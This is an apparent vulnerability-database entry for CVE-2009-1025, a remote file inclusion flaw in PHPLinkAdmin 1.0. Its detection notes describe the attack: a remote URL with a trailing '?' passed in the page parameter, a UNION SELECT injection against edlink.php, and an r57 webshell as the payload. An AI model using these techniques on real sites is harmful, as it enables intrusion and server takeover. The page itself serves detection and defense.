CVE-2009-1025
published 2009-03-20CVE-2009-1025: PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
29.83%
98.0th percentile
PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beerwin | phplinkadmin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests to linkadmin.php where the 'page' parameter contains an external URL (http:// or https://), indicating a Remote File Inclusion attempt. ↗
- →The RFI payload appends a trailing '?' to the remote URL to nullify any local file extension appended by the include statement — detect this pattern in the 'page' parameter value. ↗
- →The vulnerable include is triggered without authentication ('Direct acces to linkadmin.No auth.'); alert on any unauthenticated access to linkadmin.php with a non-empty 'page' parameter. ↗
- →Detect SQL injection attempts against edlink.php via the 'linkid' parameter, specifically payloads using UNION SELECT with concat_ws to extract user(), database(), and version(). ↗
- →The r57 webshell (r57.txt) is the payload delivered via RFI; presence of r57.txt or r57.php on the filesystem or in web logs is a strong indicator of compromise. ↗
- ·The vulnerable code uses $_REQUEST['page'] with no sanitization or authentication check, meaning the RFI is exploitable by any unauthenticated remote attacker. ↗
- ·The SQL injection in edlink.php also uses $_REQUEST['linkid'] with no sanitization, making it exploitable without authentication as well. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/52779http://secunia.com/advisories/34323http://www.securityfocus.com/bid/34129http://www.vupen.com/english/advisories/2009/0733https://exchange.xforce.ibmcloud.com/vulnerabilities/49265https://www.exploit-db.com/exploits/8216http://osvdb.org/52779http://secunia.com/advisories/34323http://www.securityfocus.com/bid/34129http://www.vupen.com/english/advisories/2009/0733https://exchange.xforce.ibmcloud.com/vulnerabilities/49265https://www.exploit-db.com/exploits/8216
2009-03-20
Published